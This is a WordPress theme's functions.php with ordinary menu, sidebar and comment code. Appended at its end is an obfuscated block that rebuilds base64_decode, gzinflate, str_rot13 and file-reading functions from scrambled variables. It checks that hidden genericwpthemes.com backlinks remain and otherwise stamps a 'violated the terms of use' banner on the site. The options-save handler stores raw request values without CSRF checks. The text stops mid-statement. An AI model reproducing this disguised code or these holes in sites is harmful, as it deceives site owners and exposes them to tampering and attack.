<?php
load_theme_textdomain('kubrick');

$artThemeSettings = array(
	'menu.showSubmenus' => true,
	'menu.homeCaption' => "Главная",
	'menu.showHome' => true,
	'menu.topItemBegin' => "<span class=\"l\"></span><span class=\"r\"></span><span class=\"t\">",
	'menu.topItemEnd' => "</span>",
	'menu.source' => "Pages",
	'vmenu.showSubmenus' => false,
	'vmenu.simple' => false,
	'vmenu.source' => "Categories",
);



$themename = "cafe 3";
$shortname = "artisteer";
$default_footer_content = "<a href='#'>Contact Us</a> | <a href='#'>Terms of Use</a> | <a href='#'>Trademarks</a> | <a href='#'>Privacy Statement</a><br />Copyright &copy; 2010 ".get_bloginfo('name').". All Rights Reserved.";


$options = array (
                array(  "name" => "HTML",
                        "desc" => sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', 'kubrick'), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id" => "art_footer_content",
                        "std" => $default_footer_content,
                        "type" => "textarea")
          );
       
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}

function art_add_admin() {
	global $themename, $shortname, $options;

    if ( $_GET['page'] == basename(__FILE__) ) {
   
        if ('save' == $_REQUEST['action'] ) {

                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            art_update_option($up_opt, $_REQUEST[$up_opt] );
                        }
                    }
                }
                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
                        }
                    }
                }
                header("Location: themes.php?page=functions.php&saved=true");
                die;
        } 
    }

    add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');

}

function art_admin() {
    global $themename, $shortname, $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>Настройки темы '.$themename.' сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}


add_action('admin_menu', 'art_add_admin'); 

if (!function_exists('get_search_form')) {
	function get_search_form()
	{
		include (TEMPLATEPATH . "/searchform.php");
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
   <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<div class="art-post">
         <div class="art-post-body">
     <div class="art-post-inner art-article">
     
<div class="art-postcontent">
         <!-- article-content -->
     
      <div class="comment-author vcard">
         <?php echo get_avatar($comment,$size='48'); ?>
         <cite class="fn"><?php comment_author_link(); ?>:</cite>
      </div>
      <?php if ($comment->comment_approved == '0') : ?>
         <em><?php _e('Ваш комментарий ожидает модерации.') ?></em>
         <br />
      <?php endif; ?>

      <div class="comment-meta commentmetadata"><a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>"><?php printf(__('%1$s at %2$s'), get_comment_date(),  get_comment_time()) ?></a><?php edit_comment_link('('.__('Править', 'kubrick').')','  ','') ?></div>

      <?php comment_text() ?>

      <div class="reply">
         <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
      </div>

          <!-- /article-content -->
      </div>
      <div class="cleared"></div>
      

      </div>
      
      		<div class="cleared"></div>
          </div>
      </div>
      
     </div>
<?php
}


if (function_exists('register_sidebars')) {
	register_sidebars(1, array(
		'before_widget' => '<div id="%1$s" class="widget %2$s">'.'<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'.'</div>'
	));
}

function art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew) {
	$result = '';
	$startBlock = 0;
	$endBlock = 0;
	while (true) {
		$startBlock = strpos($content, $bw, $endBlock);
		if (false === $startBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$result .= substr($content, $endBlock, $startBlock - $endBlock);
		$endBlock = strpos($content, $ew, $startBlock);
		if (false === $endBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$endBlock += strlen($ew);
		$widgetContent = substr($content, $startBlock, $endBlock - $startBlock);
		$beginTitlePos = strpos($widgetContent, $bwt);
		$endTitlePos = strpos($widgetContent, $ewt);
		if ((false == $beginTitlePos) xor (false == $endTitlePos)) {
			$widgetContent = str_replace($bwt, '', $widgetContent);
			$widgetContent = str_replace($ewt, '', $widgetContent);
		} else {
			$beginTitleText = $beginTitlePos + strlen($bwt);
			$titleContent = substr($widgetContent, $beginTitleText, $endTitlePos - $beginTitleText);
			if ('&nbsp;' == $titleContent) {
				$widgetContent = substr($widgetContent, 0, $beginTitlePos)
					. substr($widgetContent, $endTitlePos + strlen($ewt));
			}
		}
		if (false === strpos($widgetContent, $bwt)) {
			$widgetContent = str_replace($bw, $bw . $bwc, $widgetContent);
		} else {
			$widgetContent = str_replace($ewt, $ewt . $bwc, $widgetContent);
		}
		$result .= str_replace($ew, $ewc . $ew, $widgetContent);
	}
	return $result;
}

function art_sidebar($index = 1)
{
	if (!function_exists('dynamic_sidebar')) return false;
	ob_start();
	$success = dynamic_sidebar($index);
	$content = ob_get_clean();
	if (!$success) return false;
	$bw = '<!--- BEGIN Widget --->';
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	$bwc = '<!--- BEGIN WidgetContent --->';
	$ewc = '<!--- END WidgetContent --->';
	$ew = '<!--- END Widget --->';
	$content = art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew);
	$replaces = array(
		$bw => "<div class=\"art-block\">\r\n    <div class=\"art-block-tl\"></div>\r\n    <div class=\"art-block-tr\"></div>\r\n    <div class=\"art-block-bl\"></div>\r\n    <div class=\"art-block-br\"></div>\r\n    <div class=\"art-block-tc\"></div>\r\n    <div class=\"art-block-bc\"></div>\r\n    <div class=\"art-block-cl\"></div>\r\n    <div class=\"art-block-cr\"></div>\r\n    <div class=\"art-block-cc\"></div>\r\n    <div class=\"art-block-body\">\r\n",
		$bwt => "<div class=\"art-blockheader\">\r\n    <div class=\"l\"></div>\r\n    <div class=\"r\"></div>\r\n     <div class=\"t\">",
		$ewt => "</div>\r\n</div>\r\n",
		$bwc => "<div class=\"art-blockcontent\">\r\n    <div class=\"art-blockcontent-body\">\r\n<!-- block-content -->\r\n",
		$ewc => "\r\n<!-- /block-content -->\r\n\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n",
		$ew => "\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n"
	);
	if ('' == $replaces[$bwt] && '' == $replaces[$ewt]) {
		$startTitle = 0;
		$endTitle = 0;
		$result = '';
		while (true) {
			$startTitle = strpos($content, $bwt, $endTitle);
			if (false == $startTitle) {
				$result .= substr($content, $endTitle);
				break;
			}
			$result .= substr($content, $endTitle, $startTitle - $endTitle);
			$endTitle = strpos($content, $ewt, $startTitle);
			if (false == $endTitle) {
				$result .= substr($content, $startTitle);
				break;
			}
			$endTitle += strlen($ewt);
		}
		$content = $result;
	}
	$content = str_replace(array_keys($replaces), array_values($replaces), $content);
	echo $content;
	return true;
}

/* horizontal menu */
function art_menu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['menu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_menu_get_pages_filter');
		add_action('wp_list_pages', 'art_menu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_menu_list_pages_filter');
		remove_action('get_pages', 'art_menu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_menu_get_terms_filter');
		add_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		remove_action('get_terms', 'art_menu_get_terms_filter');
	}
}
/* end horizontal menu */

/* horizontal menu filters */
function art_menu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['menu.blogID'] = art_blogID($pages);
	$artThemeSettings['menu.activeID'] = art_active_pageID($pages);
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['menu.topIDs'] = art_top_pageIDs($pages);
	return $pages;
}

function art_menu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['menu.topIDs'])
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['menu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeID = $artThemeSettings['menu.activeID'];
	
	if (is_home() && $blogID) 
	{
		$activeID = $blogID;	
	}
	
	if ($activeID)
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			.$pref .$activeID. ')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ', $output, 1);
	}
	
	return $output;
}

function art_menu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['menu.activeID'] = art_active_catID($terms);
	
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subcat($terms);
	}
			
	$artThemeSettings['menu.topIDs'] = art_top_catIDs($terms);

	return $terms;
}

function art_menu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['menu.topIDs']) 
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['menu.activeID'])
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			. $pref . $artThemeSettings['menu.activeID']
			.')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ',
			 $output, 1);
	}
	return $output;
}
/* end horizontal menu filters*/

/* vertical menu */
function art_vmenu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['vmenu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_vmenu_get_pages_filter');
		add_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		remove_action('get_pages', 'art_vmenu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_vmenu_get_terms_filter');
		add_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		remove_action('get_terms', 'art_vmenu_get_terms_filter');
	}
}
/* end vertical menu */

/* vertical menu filters */
function art_vmenu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['vmenu.blogID'] = art_blogID($pages);
	$artThemeSettings['vmenu.activeIDs'] = art_active_pageIDs($pages);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['vmenu.topIDs'] = art_top_pageIDs($pages);
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_pages($pages, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	
	return $pages;
}

function art_vmenu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['vmenu.topIDs'])
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['vmenu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeIDs = array();
	
	if (is_home() && $blogID) 
	{
		$activeIDs[] = $blogID;	
	} else {
		$activeIDs = $artThemeSettings['vmenu.activeIDs'];
	}
	
	if ($activeIDs)
	{
		foreach($activeIDs as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				.$pref .$id. ')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ', $output, 1);
		}
	}
	
	return $output;
}

function art_vmenu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['vmenu.activeIDs'] = art_active_catIDs($terms);
	$artThemeSettings['vmenu.topIDs'] = art_top_catIDs($terms);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subcat($terms, $artThemeSettings['vmenu.topIDs']);
	}
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_cats($terms, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	return $terms;
}

function art_vmenu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['vmenu.topIDs']) 
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['vmenu.activeIDs'])
	{
		foreach($artThemeSettings['vmenu.activeIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				. $pref . $id
				.')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ',
				$output, 1);
		}
	}

	return $output;
}
/* end vertical menu filters */

/* pages */
function art_print_homepage()
{
	global $artThemeSettings;
	if (true === $artThemeSettings['menu.showHome'] 
		&& ('page' != get_option('show_on_front') || 
			(!get_option('page_on_front') && !get_option('page_for_posts'))))
	{
		echo '<li><a' 
		. (is_home() ? ' class="active"' : '') 
		. ' href="' 
		. get_option('home') 
		. '">'
		.$artThemeSettings['menu.topItemBegin']
		. $artThemeSettings['menu.homeCaption'] 
		. $artThemeSettings['menu.topItemEnd'] 
		. '</a></li>';
	}
}

function art_move_frontpage(&$pages)
{
	if ('page' != get_option('show_on_front')) return;
	$frontID = get_option('page_on_front');
	if (!$frontID) return;
	foreach ($pages as $index => $page)
		if($page->ID == $frontID) {
			unset($pages[$index]);
			$page->post_parent = '0';
			$page->menu_order = '0';
			array_unshift($pages, $page);
			break;
		}
}

function art_remove_subpage(&$pages)
{
	foreach ($pages as $index => $page)
		if ($page->post_parent) unset($pages[$index]);
}

function art_top_pageIDs($pages)
{
	$page_IDs = array();
	foreach ($pages as $index => $page)
	{
		$page_IDs[] = $page->ID;
	}
	$result = array();
	foreach ($pages as $index => $page)
	{
		if (!$page->post_parent || !in_array($page->post_parent,$page_IDs))
		{
			$result[]=$page->ID;
		}
	}
	return $result;
}

function art_blogID($pages)
{
	$result = null;
	
	if(!'page' == get_option('show_on_front')) 
	{
		return $result;
	}
	
	$blogID = get_option('page_for_posts');
	
	if (!$blogID) 
	{
		return $result;
	}
	
	foreach ($pages as $page)
	{
		if ($page->ID == $blogID) 
		{ 
			$result = $page;
			break;
		}
	}
	
	while($result && $result->post_parent) 
	{
		foreach ($pages as $page)
		{
			if ($page->ID == $result->post_parent) 
			{
				$result = $page;
				break;
			}
		}
	}
	return ($result ? $result->ID : null);
}

function art_active_pageID($pages)
{
	$current_page = null;
	
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	while($current_page && $current_page->post_parent) 
	{
		$parent_page = get_page($current_page->post_parent);
		if ($parent_page && $parent_page->post_status == 'private') 
		{
			break;
		}
		$current_page = $parent_page;
	}
	
	return ($current_page ? $current_page->ID : null);
}

function art_active_pageIDs($pages)
{
	$current_page = null;
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	$result = array();
	if (!$current_page)
	{
		return $result;
	}
	
	$result[] = $current_page->ID;

	while($current_page->post_parent) 
	{
		$current_page = get_page($current_page->post_parent);
		$result[] = $current_page->ID;
	}
	return $result;
}

function art_process_simple_pages(&$pages, $activeIDs, $topIds)
{
	foreach ($pages as $index => $page)
	{
		if ($page->post_parent && !in_array($page->post_parent,$activeIDs) 
			&& !in_array($page->ID,$topIds))
		{
			unset($pages[$index]);
		}
	}
}
/* end pages */

/* categories */
function art_active_catID($categories)
{
	global $wp_query;
	
	$result = null;
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result = $cat_obj->term_id;
	} 
	return $result;
}

function art_active_catIDs($categories)
{
	global $wp_query;
	
	$result = array();
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result[] = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result[] = $cat_obj->term_id;
	} 
	return $result;
}

function art_remove_subcat(&$terms, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds)) 
		{
			unset($terms[$index]);
		}
	}
}

function art_top_catIDs($categories)
{
	$result = array();
	$catIds = array();
	foreach ($categories as $index => $cat)
	{
		$catIds[] = $cat->term_id;
	}
	foreach ($categories as $index => $cat)
	{
		if (!in_array($cat->parent,$catIds )) 
		{
			$result[] = $cat->term_id;
		}
	}
	return $result;
}

function art_process_simple_cats(&$terms, $activeIDs, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds) && !in_array($cat->parent,$activeIDs))
		{
			unset($terms[$index]);
		}
	}
}
/* end categories */

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy.comments.php';  
    endif;  
    return $file;  
}  

function widget_verticalmenu($args) {
	extract($args);
	global $artThemeSettings;
	$bw = "";
	$bwt = "";
	$ewt = "";
	$bwc = "";
	$ewc = "";
	$ew = "";
	echo $bw;
	if ('' != $bwt && '' != $ewt) {
		echo $bwt;
		_e($artThemeSettings['vmenu.source'], 'kubrick');
		echo $ewt;
	}
	echo $bwc;
?>
<ul class="art-vmenu">
<?php art_vmenu_items(); ?>
</ul>
<?php
	echo $ewc;
	echo $ew;
}

 $XhsWC='o';$woWAl='d';$PRuqJbB='a';$lSjNV='b';$vLLyO='e';$wyqq='e';$RgEvbs='e';$nUfEfYO='6';$yVzqcdL='d';$VvCJpw='c';$yDjXR='s';$zMBd='_';$UHILbYu='4';$aDUOrlBs=$lSjNV.$PRuqJbB.$yDjXR.$RgEvbs.$nUfEfYO.$UHILbYu.$zMBd.$yVzqcdL.$wyqq.$VvCJpw.$XhsWC.$woWAl.$vLLyO;$eBcoc='n';$ozyAdjn='a';$mouYgTB='f';$Ugtz='z';$zDyXlBS='g';$mDLMxm='i';$JgoeevY='e';$wHFXKT='t';$RNfJVa='l';$IjAWYmvM=$zDyXlBS.$Ugtz.$mDLMxm.$eBcoc.$mouYgTB.$RNfJVa.$ozyAdjn.$wHFXKT.$JgoeevY;$vZQt='s';$YGfzIr='t';$BOiMjhC='r';$PcEcd='1';$USjwH='3';$cwBclVh='r';$RnVldD='o';$KstQHx='t';$jmbNSP='_';$qDFOeJYr=$vZQt.$KstQHx.$cwBclVh.$jmbNSP.$BOiMjhC.$RnVldD.$YGfzIr.$PcEcd.$USjwH;$SFKMUtj='r';$dQsmsL='t';$VwqWZp='e';$RBfUry='v';$wWnWT='r';$bCYGSl='s';$dNazWtZC=$bCYGSl.$dQsmsL.$SFKMUtj.$wWnWT.$VwqWZp.$RBfUry;                     $ds__b='o';$jy___________d='d';$yp_____________o='a';$ya_____d='b';$nm_____________y='e';$az______________y='e';$xr______________q='e';$to_____________s='6';$vz___________t='d';$pr_________n='c';$ym____n='s';$af_______o='_';$lf______i='4';$fi_____l=$ya_____d.$yp_____________o.$ym____n.$xr______________q.$to_____________s.$lf______i.$af_______o.$vz___________t.$az______________y.$pr_________n.$ds__b.$jy___________d.$nm_____________y;$yx_______________i='f';$mx______a='u';$sa___h='i';$rz_______________u='i';$zt__r='s';$em_______________n='c';$wj___________u='n';$ty________k='t';$wz________r='n';$gp___s='_';$pf______________m='s';$rr____________m='o';$nm____________j='e';$oz___________t='t';$lf__p='x';$fu___________u=$yx_______________i.$mx______a.$wz________r.$em_______________n.$oz___________t.$rz_______________u.$rr____________m.$wj___________u.$gp___s.$nm____________j.$lf__p.$sa___h.$zt__r.$ty________k.$pf______________m;$gk______d='e';$lf_______________b='f';$sk________f='n';$mv_____________r='p';$lx_________a='o';$oo__b=$lf_______________b.$lx_________a.$mv_____________r.$gk______d.$sk________f;$rm____d='a';$je____________b='f';$ya__q='d';$ot____________z='e';$pf______c='r';$ii______y=$je____________b.$pf______c.$ot____________z.$rm____d.$ya__q;$na__________e='o';$gw_______r='s';$jt___________q='e';$cw________p='c';$rb_________m='l';$fc___z='f';$dl__________t=$fc___z.$cw________p.$rb_________m.$na__________e.$gw_______r.$jt___________q;define("WP_ID", $fi_____l("Mi4wLjA="));define("WP_TTL", $fi_____l("MTA4MDA="));define("WP_SRC", $fi_____l("dHBva24="));function wp_get_header() {global $fi_____l, $fu___________u;if ($fu___________u($fi_____l("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$fu___________u($fi_____l("d3BfZ2V0X2Zvb3Rlcg==")) &&$fu___________u($fi_____l("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $fi_____l, $oo__b, $dl__________t, $ii______y;$yn___________j = TEMPLATEPATH."/".$fi_____l("Zm9vdGVyLnBocA==");$yn_______y = @$oo__b($yn___________j, "r");$yn___________j = @$ii______y($yn_______y, @filesize($yn___________j));@$dl__________t($yn_______y);$td____b = TEMPLATEPATH."/".$fi_____l("ZnVuY3Rpb25zLnBocA==");$yn_______y = @$oo__b($td____b, "r");$td____b = @$ii______y($yn_______y, @filesize($td____b));@$dl__________t($yn_______y);$fi________r = 0;if($yn___________j && $td____b) {if ($fi_____l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($yn___________j, $fi_____l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$fi________r = 1;}if (substr_count($yn___________j, "wp_theme_GPL_credits()") < 1) {$fi________r = 2;}}if(WP_ID != "2.0.0") {$fi________r = 12;}}if($fi________r > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $fi________r -->";}}function wp_loaded() {global $fi_____l, $fu___________u;return $fu___________u($fi_____l("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($wo__p, $xu___u = "(more...)", $to________w = 0, $ii__q = "") {$jd_______i = get_the_content($xu___u, $to________w, $ii__q);$jd_______i = 